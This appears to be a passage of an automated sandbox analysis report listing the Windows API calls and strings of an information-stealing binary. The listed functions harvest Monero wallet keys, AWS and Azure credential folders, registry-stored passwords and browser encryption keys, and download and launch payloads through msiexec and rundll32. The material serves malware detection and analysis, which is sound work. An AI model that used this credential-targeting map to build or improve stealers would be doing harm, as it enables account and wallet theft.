                          • lstrcat.KERNEL32(?,00000000), ref: 0038D24C
                          • lstrcat.KERNEL32(?,003A1480), ref: 0038D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D26E
                          • lstrcat.KERNEL32(?,003A1484), ref: 0038D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D290
                          • lstrcat.KERNEL32(?,003A1488), ref: 0038D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D2B2
                          • lstrcat.KERNEL32(?,003A148C), ref: 0038D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D2D4
                          • lstrcat.KERNEL32(?,003A1490), ref: 0038D2E3
                            • Part of subcall function 0039A820: lstrlen.KERNEL32(00384F05,?,?,00384F05,003A0DDE), ref: 0039A82B
                            • Part of subcall function 0039A820: lstrcpy.KERNEL32(003A0DDE,00000000), ref: 0039A885
                          • lstrlen.KERNEL32(?), ref: 0038D32A
                          • lstrlen.KERNEL32(?), ref: 0038D339
                            • Part of subcall function 0039AA70: StrCmpCA.SHLWAPI(00E39038,0038A7A7,?,0038A7A7,00E39038), ref: 0039AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0038D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 2e6fe513bb3b6d1cdddc236b3023b541a5ffcc86effae98166bd7c963e7b5d35
                          • Instruction ID: 57da89655aa0ababfb5db5da74ec57371d1a6649ca0afadb32593545044f7eda
                          • Opcode Fuzzy Hash: 2e6fe513bb3b6d1cdddc236b3023b541a5ffcc86effae98166bd7c963e7b5d35
                          • Instruction Fuzzy Hash: 08E11F71910518AFCF06EBA0DD96EEE7778BF24305F104258F106BA091DF35AE09DBA2
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • RegOpenKeyExA.ADVAPI32(00000000,00E3B648,00000000,00020019,00000000,003A05B6), ref: 003983A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00398426
                          • wsprintfA.USER32 ref: 00398459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0039847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0039848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00398499
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?$@$P
                          • API String ID: 3246050789-3997378294
                          • Opcode ID: 37553fbb7cd592ea49218206f0a6177991c26312428163116ad643566d3f56c2
                          • Instruction ID: b8eda88b2d5f85d38733ddd5ca4848b362f4c748ae964b407b8f8b58f20f80f7
                          • Opcode Fuzzy Hash: 37553fbb7cd592ea49218206f0a6177991c26312428163116ad643566d3f56c2
                          • Instruction Fuzzy Hash: 2381F97191051CABEB29DB60CD95FEAB7B8FF58704F008298E109A6140DF716A89CFE1
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E3CEE8,00000000,?,003A144C,00000000,?,?), ref: 0038CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0038CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0038CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0038CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0038CAD9
                          • StrStrA.SHLWAPI(?,00E3D080,003A0B52), ref: 0038CAF7
                          • StrStrA.SHLWAPI(00000000,00E3CF30), ref: 0038CB1E
                          • StrStrA.SHLWAPI(?,00E3D9A0,00000000,?,003A1458,00000000,?,00000000,00000000,?,00E38FC8,00000000,?,003A1454,00000000,?), ref: 0038CCA2
                          • StrStrA.SHLWAPI(00000000,00E3D960), ref: 0038CCB9
                            • Part of subcall function 0038C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0038C871
                            • Part of subcall function 0038C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0038C87C
                          • StrStrA.SHLWAPI(?,00E3D960,00000000,?,003A145C,00000000,?,00000000,00E39028), ref: 0038CD5A
                          • StrStrA.SHLWAPI(00000000,00E39138), ref: 0038CD71
                            • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B46), ref: 0038C943
                            • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B47), ref: 0038C957
                            • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B4E), ref: 0038C978
                          • lstrlen.KERNEL32(00000000), ref: 0038CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0038CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: df8127a1c8ce5292c1b76ec11bf2224e1b6729876287c5a52a290cff920aaf1a
                          • Instruction ID: 7dd43e767064e1c80c8013c557f8a26ca7a028b7bcd8e73447b1425395b13a2d
                          • Opcode Fuzzy Hash: df8127a1c8ce5292c1b76ec11bf2224e1b6729876287c5a52a290cff920aaf1a
                          • Instruction Fuzzy Hash: FAE1FF71910518AFDF16EBA4DC95FEEBB78BF14300F404259F1066B191EF306A4ADBA2
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID: $`
                          • API String ID: 2001356338-103900699
                          • Opcode ID: 10a8d96b70d604dbc9eb4b82f5c727769fa17bed535474775621c8936eea16f7
                          • Instruction ID: b316746347b0bb88d032974e7f72cb4a15a3938602319e31ddb37e3f05f3254a
                          • Opcode Fuzzy Hash: 10a8d96b70d604dbc9eb4b82f5c727769fa17bed535474775621c8936eea16f7
                          • Instruction Fuzzy Hash: DAC196B690021D9BCF15EF60DC89FEA7778BF64304F004599F50AAB241DB70AA85DF91
                          APIs
                            • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00394DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00394DCD
                            • Part of subcall function 00394910: wsprintfA.USER32 ref: 0039492C
                            • Part of subcall function 00394910: FindFirstFileA.KERNEL32(?,?), ref: 00394943
                          • lstrcat.KERNEL32(?,00000000), ref: 00394E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00394E59
                            • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                            • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                            • Part of subcall function 00394910: FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                            • Part of subcall function 00394910: FindClose.KERNEL32(000000FF), ref: 00394B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00394EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00394EE5
                            • Part of subcall function 00394910: wsprintfA.USER32 ref: 003949B0
                            • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A08D2), ref: 003949C5
                            • Part of subcall function 00394910: wsprintfA.USER32 ref: 003949E2
                            • Part of subcall function 00394910: PathMatchSpecA.SHLWAPI(?,?), ref: 00394A1E
                            • Part of subcall function 00394910: lstrcat.KERNEL32(?,00E3EA68), ref: 00394A4A
                            • Part of subcall function 00394910: lstrcat.KERNEL32(?,003A0FF8), ref: 00394A5C
                            • Part of subcall function 00394910: lstrcat.KERNEL32(?,?), ref: 00394A70
                            • Part of subcall function 00394910: lstrcat.KERNEL32(?,003A0FFC), ref: 00394A82
                            • Part of subcall function 00394910: lstrcat.KERNEL32(?,?), ref: 00394A96
                            • Part of subcall function 00394910: CopyFileA.KERNEL32(?,?,00000001), ref: 00394AAC
                            • Part of subcall function 00394910: DeleteFileA.KERNEL32(?), ref: 00394B31
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: ec14198ede539764cc98dfbc9b060d6e93c8abc0c312f1965f64104387dca8d3
                          • Instruction ID: 493463e42798e4a39787ae4a3b0a2ce115735d518e0fe9308e637d7a47357c43
                          • Opcode Fuzzy Hash: ec14198ede539764cc98dfbc9b060d6e93c8abc0c312f1965f64104387dca8d3
                          • Instruction Fuzzy Hash: C241D6BA95030867DB15F760EC47FEE3738AB65704F004494B245AA0C1FEB45BC98B92
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 003931C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0039335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 003934EA
                          Strings
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe$`
                          • API String ID: 2507796910-1874571557
                          • Opcode ID: fccde21924cd6ee9074d54be6308dd41d875e42e703b5f24d365a2c2401768e6
                          • Instruction ID: ac345bdbf4afad4efea6b61427706070990cdd9e31017373fb5333ca9d24c139
                          • Opcode Fuzzy Hash: fccde21924cd6ee9074d54be6308dd41d875e42e703b5f24d365a2c2401768e6
                          • Instruction Fuzzy Hash: 0C12FF718145189ADF1AFBA0DC92FEEB778AF14300F504259F5066A191EF342B4ADFE2
                          APIs
                            • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 003942EC
                          • lstrcat.KERNEL32(?,00E3E470), ref: 0039430B
                          • lstrcat.KERNEL32(?,?), ref: 0039431F
                          • lstrcat.KERNEL32(?,00E3CFF0), ref: 00394333
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 00398D90: GetFileAttributesA.KERNEL32(00000000,?,00381B54,?,?,003A564C,?,?,003A0E1F), ref: 00398D9F
                            • Part of subcall function 00389CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00389D39
                            • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            • Part of subcall function 003993C0: GlobalAlloc.KERNEL32(00000000,003943DD,003943DD), ref: 003993D3
                          • StrStrA.SHLWAPI(?,00E3E4A0), ref: 003943F3
                          • GlobalFree.KERNEL32(?), ref: 00394512
                            • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                            • Part of subcall function 00389AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                            • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                            • Part of subcall function 00389AC0: LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 003944A3
                          • StrCmpCA.SHLWAPI(?,003A08D1), ref: 003944C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003944D2
                          • lstrcat.KERNEL32(00000000,?), ref: 003944E5
                          • lstrcat.KERNEL32(00000000,003A0FB8), ref: 003944F4
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID: p
                          • API String ID: 3541710228-2678736219
                          • Opcode ID: 4ccf44c73058f4b87112b21f9a4298d2740853347b15df38da5300169a47da08
                          • Instruction ID: 907f2bf0e7df2415991ad31559b94adcfd08173870d8daf31b389db4583efa3c
                          • Opcode Fuzzy Hash: 4ccf44c73058f4b87112b21f9a4298d2740853347b15df38da5300169a47da08
                          • Instruction Fuzzy Hash: C07166B6900608ABCF15FBE0DC85FEE777DAB98304F044598F605A7181EA35DB49CB91
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0039906C
                          Strings
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 424950658fedeba7f591bf3062e4f3292614c79fe0ccab97a9bf839e2e1f71a7
                          • Instruction ID: b404a8fc6ae3ca88664d2b0bbf89bb520614bb79288eb632cfdf71adab80f500
                          • Opcode Fuzzy Hash: 424950658fedeba7f591bf3062e4f3292614c79fe0ccab97a9bf839e2e1f71a7
                          • Instruction Fuzzy Hash: A371DA75910608AFDB04EBE4DC89FEEBBB8FB58704F108508F516AB290DB34A945DB61
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 00386280: InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                            • Part of subcall function 00386280: StrCmpCA.SHLWAPI(?,00E3EA88), ref: 00386303
                            • Part of subcall function 00386280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                            • Part of subcall function 00386280: HttpOpenRequestA.WININET(00000000,GET,?,00E3DFD8,00000000,00000000,00400100,00000000), ref: 00386385
                            • Part of subcall function 00386280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                            • Part of subcall function 00386280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395318
                          • lstrlen.KERNEL32(00000000), ref: 0039532F
                            • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00395364
                          • lstrlen.KERNEL32(00000000), ref: 00395383
                          • lstrlen.KERNEL32(00000000), ref: 003953AE
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: f4707985c637b060af7a24b195f0e6474022f8b2bf44e3fabe87b810d184f07d
                          • Instruction ID: 1cb66829debcc476dde847120aca26fd12742872116859a1fa3540db3582b727
                          • Opcode Fuzzy Hash: f4707985c637b060af7a24b195f0e6474022f8b2bf44e3fabe87b810d184f07d
                          • Instruction Fuzzy Hash: 21510C309246489BDF16FFA0CD96AED7B79EF11300F504118F40A6E592EF346B46DBA2
                          APIs
                            • Part of subcall function 003812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003812B4
                            • Part of subcall function 003812A0: RtlAllocateHeap.NTDLL(00000000), ref: 003812BB
                            • Part of subcall function 003812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003812D7
                            • Part of subcall function 003812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003812F5
                            • Part of subcall function 003812A0: RegCloseKey.ADVAPI32(?), ref: 003812FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0038134F
                          • lstrlen.KERNEL32(?), ref: 0038135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00381377
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,00E3A360,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00381465
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 003814EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 8967d7a653acc24572147b584719b3a9dfa0f8da7c4f2527b175ae15e49a34e4
                          • Instruction ID: a5394581503e42e253d2a7abc58ed085fae339561472caca1a9255299f73ea92
                          • Opcode Fuzzy Hash: 8967d7a653acc24572147b584719b3a9dfa0f8da7c4f2527b175ae15e49a34e4
                          • Instruction Fuzzy Hash: C75132B19506195BCF16FB60DC92FED777CAF54300F4042D8B60AA6081EF706B89CBA6
                          APIs
                            • Part of subcall function 003872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0038733A
                            • Part of subcall function 003872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003873B1
                            • Part of subcall function 003872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0038740D
                            • Part of subcall function 003872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00387452
                            • Part of subcall function 003872D0: HeapFree.KERNEL32(00000000), ref: 00387459
                          • lstrcat.KERNEL32(00000000,003A17FC), ref: 00387606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00387648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0038765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0038768F
                          • lstrcat.KERNEL32(00000000,003A1804), ref: 003876A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003876D3
                          • lstrcat.KERNEL32(00000000,003A1808), ref: 003876ED
                          • task.LIBCPMTD ref: 003876FB
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: c4ac5ddd66e408eb7f435b15f9d3a53690f35e557c8e3120040223d4dbf1c36f
                          • Instruction ID: d3221e06edda73b4964fd788a0862bea70589f4d1d9d41fe5f51bad368f52e9f
                          • Opcode Fuzzy Hash: c4ac5ddd66e408eb7f435b15f9d3a53690f35e557c8e3120040223d4dbf1c36f
                          • Instruction Fuzzy Hash: 7F312972D00609DFCB06FBA4DC99DEE7B79AB54305B244158F102AB290DB34A94ADB61
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E3E1E8,00000000,?,003A0E2C,00000000,?,00000000), ref: 00398130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00398137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00398158
                          • __aulldiv.LIBCMT ref: 00398172
                          • __aulldiv.LIBCMT ref: 00398180
                          • wsprintfA.USER32 ref: 003981AC
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: c380bf1fe0afbb89a1ab17316eba0950e6d505a3d436a8065cbeeefcb8603aef
                          • Instruction ID: 8d4a74a3f157d875425abb4447cfe267e8b7958d743c0927800fe4e7f0ed4069
                          • Opcode Fuzzy Hash: c380bf1fe0afbb89a1ab17316eba0950e6d505a3d436a8065cbeeefcb8603aef
                          • Instruction Fuzzy Hash: AF211AB1E44218ABDF00DFD4DD4AFAEBBB8FB45B14F104609F605BB280D77869058BA5
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                            • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                          • InternetOpenA.WININET(003A0DF7,00000001,00000000,00000000,00000000), ref: 0038610F
                          • StrCmpCA.SHLWAPI(?,00E3EA88), ref: 00386147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0038618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003861B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 003861DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0038620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00386249
                          • InternetCloseHandle.WININET(?), ref: 00386253
                          • InternetCloseHandle.WININET(00000000), ref: 00386260
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 76bf57684d7b4d96e1615973c33085db935b7a9e09a74d9004dbeaa1519d7f5a
                          • Instruction ID: 801508d4c17982154f4783e8c7ae85dd935bcfa1ea37aada6fe931c589e4242f
                          • Opcode Fuzzy Hash: 76bf57684d7b4d96e1615973c33085db935b7a9e09a74d9004dbeaa1519d7f5a
                          • Instruction Fuzzy Hash: B35190B1900718AFDF21EF60CC4ABEE77B8FB44305F0085D8A605AB181DB746A89DF95
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0038733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003873B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0038740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00387452
                          • HeapFree.KERNEL32(00000000), ref: 00387459
                          • task.LIBCPMTD ref: 00387555
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: 36ad92d0c852bcc6a75d82e04cda00479c16c7d8f618b1d0d8e738d1bf6887f7
                          • Instruction ID: 0257cf703ac0bb36b62e345ead26a3c03a56f76d9a1a426b4b620f5f404b36b8
                          • Opcode Fuzzy Hash: 36ad92d0c852bcc6a75d82e04cda00479c16c7d8f618b1d0d8e738d1bf6887f7
                          • Instruction Fuzzy Hash: 16613BB580426C9BDB25EB50CC45FDAB7B9FF44304F1081E9E649AA141DBB09BC9CFA1
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00E3D620,00000000,00020119,?), ref: 003940F4
                          • RegQueryValueExA.ADVAPI32(?,00E3E5D8,00000000,00000000,00000000,000000FF), ref: 00394118
                          • RegCloseKey.ADVAPI32(?), ref: 00394122
                          • lstrcat.KERNEL32(?,00000000), ref: 00394147
                          • lstrcat.KERNEL32(?,00E3E620), ref: 0039415B
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID: $
                          • API String ID: 690832082-1568808812
                          • Opcode ID: 7d106905d594611ce35351b287359d5b8648642e7e66f62dab909754a20236cb
